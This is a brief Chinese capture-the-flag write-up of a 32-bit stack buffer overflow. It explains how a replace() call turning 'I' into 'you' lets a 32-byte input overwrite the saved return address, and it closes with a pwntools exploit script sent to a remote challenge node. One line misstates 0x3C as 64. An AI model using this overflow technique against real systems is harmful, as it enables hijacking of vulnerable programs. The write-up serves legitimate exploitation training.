查找字符串,发现了一个flag.txt。
输入在这里
限制为32长度的输入
看到EBP的地址
这个flag的地址是08048F0D
这个基准位置EBP(0x00000000)的下面一个就是EIP
图示如下,我觉得我已经明白了
±--------------+
|ESP |
±--------------+
| buf |
±--------------+
| 填充物 |
±--------------+
| EBP |
±--------------+
| EIP |
±--------------+
| … …|
| 内存高址 |
S的容量是32.
这里有fget 函数约束,不能输入超过32B的字符
那么要溢出到eip的位置,劫持返回地址,就必须要达到3C的大小。才能够覆盖到eip
原则上是不可能有那么长的,但是后面有一个replace 函数,把’I’替换为了’you’,那么I就是3个长度位了。
0x3C=64=20*3+4
from pwn import *
p = remote('node3.buuoj.cn', '28482')
payload = b'I'* 20+b'a'*0x4+ p32(0x08048F0D)
p.sendline(payload)
p.interactive()